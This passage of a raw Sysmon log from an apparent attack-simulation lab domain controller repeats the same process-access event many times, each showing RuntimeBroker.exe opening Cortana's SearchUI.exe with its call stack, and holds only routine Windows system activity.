13:30:11.920{08A6967A-4753-6000-0D05-000000009A01}11165948C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\System32\windows.storage.dll+63fa1|C:\Windows\System32\windows.storage.dll+fd3d6|C:\Windows\System32\windows.storage.dll+fed38|C:\Windows\system32\windows.cortana.Desktop.dll+f90c|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+924ab|C:\Windows\System32\combase.dll+938c2|C:\Windows\System32\combase.dll+51ca3|C:\Windows\System32\combase.dll+939dd|C:\Windows\System32\combase.dll+507df|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x800000000000000011968Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.920{08A6967A-4753-6000-0D05-000000009A01}11165948C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\System32\windows.storage.dll+63fa1|C:\Windows\System32\windows.storage.dll+669f8|C:\Windows\System32\windows.storage.dll+7b6e4|C:\Windows\System32\windows.storage.dll+17478b|C:\Windows\system32\windows.cortana.Desktop.dll+fbaa|C:\Windows\system32\windows.cortana.Desktop.dll+f80b|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+924ab|C:\Windows\System32\combase.dll+938c2|C:\Windows\System32\combase.dll+51ca3|C:\Windows\System32\combase.dll+939dd|C:\Windows\System32\combase.dll+507df|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba 10341000x800000000000000011967Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.920{08A6967A-4753-6000-0D05-000000009A01}11165696C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\System32\windows.storage.dll+63fa1|C:\Windows\System32\windows.storage.dll+fd3d6|C:\Windows\System32\windows.storage.dll+fed38|C:\Windows\system32\windows.cortana.Desktop.dll+f90c|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+924ab|C:\Windows\System32\combase.dll+938c2|C:\Windows\System32\combase.dll+51ca3|C:\Windows\System32\combase.dll+939dd|C:\Windows\System32\combase.dll+507df|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x800000000000000011966Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.920{08A6967A-4753-6000-0D05-000000009A01}11165952C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\System32\windows.storage.dll+63fa1|C:\Windows\System32\windows.storage.dll+fd3d6|C:\Windows\System32\windows.storage.dll+fed38|C:\Windows\system32\windows.cortana.Desktop.dll+f90c|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+924ab|C:\Windows\System32\combase.dll+938c2|C:\Windows\System32\combase.dll+51ca3|C:\Windows\System32\combase.dll+939dd|C:\Windows\System32\combase.dll+507df|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x800000000000000011965Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.920{08A6967A-4753-6000-0D05-000000009A01}11165696C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\System32\windows.storage.dll+63fa1|C:\Windows\System32\windows.storage.dll+669f8|C:\Windows\System32\windows.storage.dll+7b6e4|C:\Windows\System32\windows.storage.dll+17478b|C:\Windows\system32\windows.cortana.Desktop.dll+fbaa|C:\Windows\system32\windows.cortana.Desktop.dll+f80b|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+924ab|C:\Windows\System32\combase.dll+938c2|C:\Windows\System32\combase.dll+51ca3|C:\Windows\System32\combase.dll+939dd|C:\Windows\System32\combase.dll+507df|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba 10341000x800000000000000011964Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.920{08A6967A-4753-6000-0D05-000000009A01}11165952C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\System32\windows.storage.dll+63fa1|C:\Windows\System32\windows.storage.dll+669f8|C:\Windows\System32\windows.storage.dll+7b6e4|C:\Windows\System32\windows.storage.dll+17478b|C:\Windows\system32\windows.cortana.Desktop.dll+fbaa|C:\Windows\system32\windows.cortana.Desktop.dll+f80b|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+924ab|C:\Windows\System32\combase.dll+938c2|C:\Windows\System32\combase.dll+51ca3|C:\Windows\System32\combase.dll+939dd|C:\Windows\System32\combase.dll+507df|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba 10341000x800000000000000011963Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.920{08A6967A-4753-6000-0D05-000000009A01}11165948C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\System32\windows.storage.dll+63fa1|C:\Windows\System32\windows.storage.dll+fd3d6|C:\Windows\System32\windows.storage.dll+fed38|C:\Windows\system32\windows.cortana.Desktop.dll+f90c|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+924ab|C:\Windows\System32\combase.dll+938c2|C:\Windows\System32\combase.dll+51ca3|C:\Windows\System32\combase.dll+939dd|C:\Windows\System32\combase.dll+507df|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x800000000000000011962Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.920{08A6967A-4753-6000-0D05-000000009A01}11165948C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\System32\windows.storage.dll+63fa1|C:\Windows\System32\windows.storage.dll+669f8|C:\Windows\System32\windows.storage.dll+7b6e4|C:\Windows\System32\windows.storage.dll+17478b|C:\Windows\system32\windows.cortana.Desktop.dll+fbaa|C:\Windows\system32\windows.cortana.Desktop.dll+f80b|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+924ab|C:\Windows\System32\combase.dll+938c2|C:\Windows\System32\combase.dll+51ca3|C:\Windows\System32\combase.dll+939dd|C:\Windows\System32\combase.dll+507df|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba 10341000x800000000000000011961Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.920{08A6967A-4753-6000-0D05-000000009A01}11165696C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\System32\windows.storage.dll+63fa1|C:\Windows\System32\windows.storage.dll+fd3d6|C:\Windows\System32\windows.storage.dll+fed38|C:\Windows\system32\windows.cortana.Desktop.dll+f90c|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+924ab|C:\Windows\System32\combase.dll+938c2|C:\Windows\System32\combase.dll+51ca3|C:\Windows\System32\combase.dll+939dd|C:\Windows\System32\combase.dll+507df|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x800000000000000011960Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.920{08A6967A-4753-6000-0D05-000000009A01}11165696C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\System32\windows.storage.dll+63fa1|C:\Windows\System32\windows.storage.dll+669f8|C:\Windows\System32\windows.storage.dll+7b6e4|C:\Windows\System32\windows.storage.dll+17478b|C:\Windows\system32\windows.cortana.Desktop.dll+fbaa|C:\Windows\system32\windows.cortana.Desktop.dll+f80b|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+924ab|C:\Windows\System32\combase.dll+938c2|C:\Windows\System32\combase.dll+51ca3|C:\Windows\System32\combase.dll+939dd|C:\Windows\System32\combase.dll+507df|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba 10341000x800000000000000011959Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.920{08A6967A-4753-6000-0D05-000000009A01}11165952C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\System32\windows.storage.dll+63fa1|C:\Windows\System32\windows.storage.dll+fd3d6|C:\Windows\System32\windows.storage.dll+fed38|C:\Windows\system32\windows.cortana.Desktop.dll+f90c|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+924ab|C:\Windows\System32\combase.dll+938c2|C:\Windows\System32\combase.dll+51ca3|C:\Windows\System32\combase.dll+939dd|C:\Windows\System32\combase.dll+507df|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x800000000000000011958Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.920{08A6967A-4753-6000-0D05-000000009A01}11165952C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\System32\windows.storage.dll+63fa1|C:\Windows\System32\windows.storage.dll+669f8|C:\Windows\System32\windows.storage.dll+7b6e4|C:\Windows\System32\windows.storage.dll+17478b|C:\Windows\system32\windows.cortana.Desktop.dll+fbaa|C:\Windows\system32\windows.cortana.Desktop.dll+f80b|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+924ab|C:\Windows\System32\combase.dll+938c2|C:\Windows\System32\combase.dll+51ca3|C:\Windows\System32\combase.dll+939dd|C:\Windows\System32\combase.dll+507df|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba 10341000x800000000000000011957Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.920{08A6967A-4753-6000-0D05-000000009A01}11165948C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\System32\windows.storage.dll+63fa1|C:\Windows\System32\windows.storage.dll+fd3d6|C:\Windows\System32\windows.storage.dll+fed38|C:\Windows\system32\windows.cortana.Desktop.dll+f90c|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+924ab|C:\Windows\System32\combase.dll+938c2|C:\Windows\System32\combase.dll+51ca3|C:\Windows\System32\combase.dll+939dd|C:\Windows\System32\combase.dll+507df|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x800000000000000011956Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.920{08A6967A-4753-6000-0D05-000000009A01}11165948C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\System32\windows.storage.dll+63fa1|C:\Windows\System32\windows.storage.dll+669f8|C:\Windows\System32\windows.storage.dll+7b6e4|C:\Windows\System32\windows.storage.dll+17478b|C:\Windows\system32\windows.cortana.Desktop.dll+fbaa|C:\Windows\system32\windows.cortana.Desktop.dll+f80b|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+924ab|C:\Windows\System32\combase.dll+938c2|C:\Windows\System32\combase.dll+51ca3|C:\Windows\System32\combase.dll+939dd|C:\Windows\System32\combase.dll+507df|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba 10341000x800000000000000011955Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.920{08A6967A-4753-6000-0D05-000000009A01}11165696C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\System32\windows.storage.dll+63fa1|C:\Windows\System32\windows.storage.dll+fd3d6|C:\Windows\System32\windows.storage.dll+fed38|C:\Windows\system32\windows.cortana.Desktop.dll+f90c|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+924ab|C:\Windows\System32\combase.dll+938c2|C:\Windows\System32\combase.dll+51ca3|C:\Windows\System32\combase.dll+939dd|C:\Windows\System32\combase.dll+507df|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x800000000000000011954Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.920{08A6967A-4753-6000-0D05-000000009A01}11165696C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\System32\windows.storage.dll+63fa1|C:\Windows\System32\windows.storage.dll+669f8|C:\Windows\System32\windows.storage.dll+7b6e4|C:\Windows\System32\windows.storage.dll+17478b|C:\Windows\system32\windows.cortana.Desktop.dll+fbaa|C:\Windows\system32\windows.cortana.Desktop.dll+f80b|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+924ab|C:\Windows\System32\combase.dll+938c2|C:\Windows\System32\combase.dll+51ca3|C:\Windows\System32\combase.dll+939dd|C:\Windows\System32\combase.dll+507df|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba 10341000x800000000000000011953Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.920{08A6967A-4753-6000-0D05-000000009A01}11165948C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\System32\windows.storage.dll+63fa1|C:\Windows\System32\windows.storage.dll+fd3d6|C:\Windows\System32\windows.storage.dll+fed38|C:\Windows\system32\windows.cortana.Desktop.dll+f90c|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+924ab|C:\Windows\System32\combase.dll+938c2|C:\Windows\System32\combase.dll+51ca3|C:\Windows\System32\combase.dll+939dd|C:\Windows\System32\combase.dll+507df|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x800000000000000011952Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.920{08A6967A-4753-6000-0D05-000000009A01}11165948C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\System32\windows.storage.dll+63fa1|C:\Windows\System32\windows.storage.dll+669f8|C:\Windows\System32\windows.storage.dll+7b6e4|C:\Windows\System32\windows.storage.dll+17478b|C:\Windows\system32\windows.cortana.Desktop.dll+fbaa|C:\Windows\system32\windows.cortana.Desktop.dll+f80b|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+924ab|C:\Windows\System32\combase.dll+938c2|C:\Windows\System32\combase.dll+51ca3|C:\Windows\System32\combase.dll+939dd|C:\Windows\System32\combase.dll+507df|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba 10341000x800000000000000011951Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.920{08A6967A-4753-6000-0D05-000000009A01}11165696C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\System32\windows.storage.dll+63fa1|C:\Windows\System32\windows.storage.dll+fd3d6|C:\Windows\System32\windows.storage.dll+fed38|C:\Windows\system32\windows.cortana.Desktop.dll+f90c|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+924ab|C:\Windows\System32\combase.dll+938c2|C:\Windows\System32\combase.dll+51ca3|C:\Windows\System32\combase.dll+939dd|C:\Windows\System32\combase.dll+507df|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x800000000000000011950Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.920{08A6967A-4753-6000-0D05-000000009A01}11165696C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\System32\windows.storage.dll+63fa1|C:\Windows\System32\windows.storage.dll+669f8|C:\Windows\System32\windows.storage.dll+7b6e4|C:\Windows\System32\windows.storage.dll+17478b|C:\Windows\system32\windows.cortana.Desktop.dll+fbaa|C:\Windows\system32\windows.cortana.Desktop.dll+f80b|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+924ab|C:\Windows\System32\combase.dll+938c2|C:\Windows\System32\combase.dll+51ca3|C:\Windows\System32\combase.dll+939dd|C:\Windows\System32\combase.dll+507df|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba 10341000x800000000000000011949Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.920{08A6967A-4753-6000-0D05-000000009A01}11165948C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\System32\windows.storage.dll+63fa1|C:\Windows\System32\windows.storage.dll+fd3d6|C:\Windows\System32\windows.storage.dll+fed38|C:\Windows\system32\windows.cortana.Desktop.dll+f90c|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+924ab|C:\Windows\System32\combase.dll+938c2